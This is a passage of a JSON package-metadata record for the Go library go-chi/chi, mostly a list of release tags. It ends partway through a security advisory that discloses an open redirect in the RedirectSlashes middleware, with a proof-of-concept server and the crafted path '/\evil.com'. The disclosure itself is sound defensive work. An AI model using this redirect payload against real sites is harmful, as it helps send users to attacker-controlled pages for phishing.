dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.214Z","dependent_packages_count":5786,"downloads":null,"downloads_period":null,"dependent_repos_count":12002,"rankings":{"downloads":null,"dependent_repos_count":0.06742509929243543,"dependent_packages_count":0.039996249728205036,"stargazers_count":0.5063864335912642,"forks_count":0.927095115270987,"docker_downloads_count":0.09664929173723362,"average":0.32751043792402507},"purl":"pkg:golang/github.com/go-chi/chi","advisories":[{"uuid":"GSA_kwCzR0hTQS1tcXFmLTV3dnAtOGZoOM4ABRGi","url":"https://github.com/advisories/GHSA-mqqf-5wvp-8fh8","title":"chi has an open redirect vulnerability in the RedirectSlashes middleware","description":"### Summary\n\nThe `RedirectSlashes` function in middleware/strip.go does not perform correct input validation and can lead to an open redirect vulnerability.\n\n### Details\n\nThe `RedirectSlashes` function performs a `Trim` to all forward slash (`/`) characters, while prepending a single one at the begining of the path (Line 52).\n\nHowever, it does not trim backslashes (`\\`).\n\n```go\nFile: middleware/strip.go\n41: func RedirectSlashes(next http.Handler) http.Handler {\n...\n51: \t\t\t// Trim all leading and trailing slashes (e.g., \"//evil.com\", \"/some/path//\")\n52: \t\t\tpath = \"/\" + strings.Trim(path, \"/\")\n...\n62: }\n```\n\nAlso, from version 5.2.2 onwards the `RedirectSlashes` function does not take into consideration the `Host` Header in the redirect response returned. This was done in order to combat another [[vulnerability](https://github.com/go-chi/chi/security/advisories/GHSA-vrw8-fxc6-2r93)](https://github.com/go-chi/chi/security/advisories/GHSA-vrw8-fxc6-2r93).\n\nThe above make it possible for a response in the following form:\n\n```\nHTTP/1.1 301 Moved Permanently\nLocation: /\\evil.com\n```\n\nThe `/\\evil.com` will be transformed by most browsers (Chrome, Firefox, etc. not Safari) into `//evil.com` which is a protocol relative URL and will result in a redirect to `evil.com`, essentially making it an open redirect vulnerability.\n\n### PoC\n\nA minimal working example can be seen below.\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"net/http\"\n\n\t\"github.com/go-chi/chi/v5\"\n\t\"github.com/go-chi/chi/v5/middleware\"\n)\n\n\n\nfunc main() {\n\tr := chi.NewRouter()\n\n\tr.Use(middleware.RedirectSlashes)\n\n\tr.Get(\"/*\", func(w http.ResponseWriter, r *http.Request) {\n\t\tw.WriteHeader(http.StatusOK)\n\t})\n\n\tfmt.Println(\"Server starting on port 8081...\")\n\tif err := http.ListenAndServe(\":8081\", r); err != nil {\n\t\tfmt.Printf(\"Error starting server: %v\\n\", err)\n\t}\n}\n\n```\n\nAnd when we request the path `/\\evil.com` (needs a second backslash or URL encoding in the terminal), the HTTP Redirect Location is just `/\\evil.com` without any domain/Host 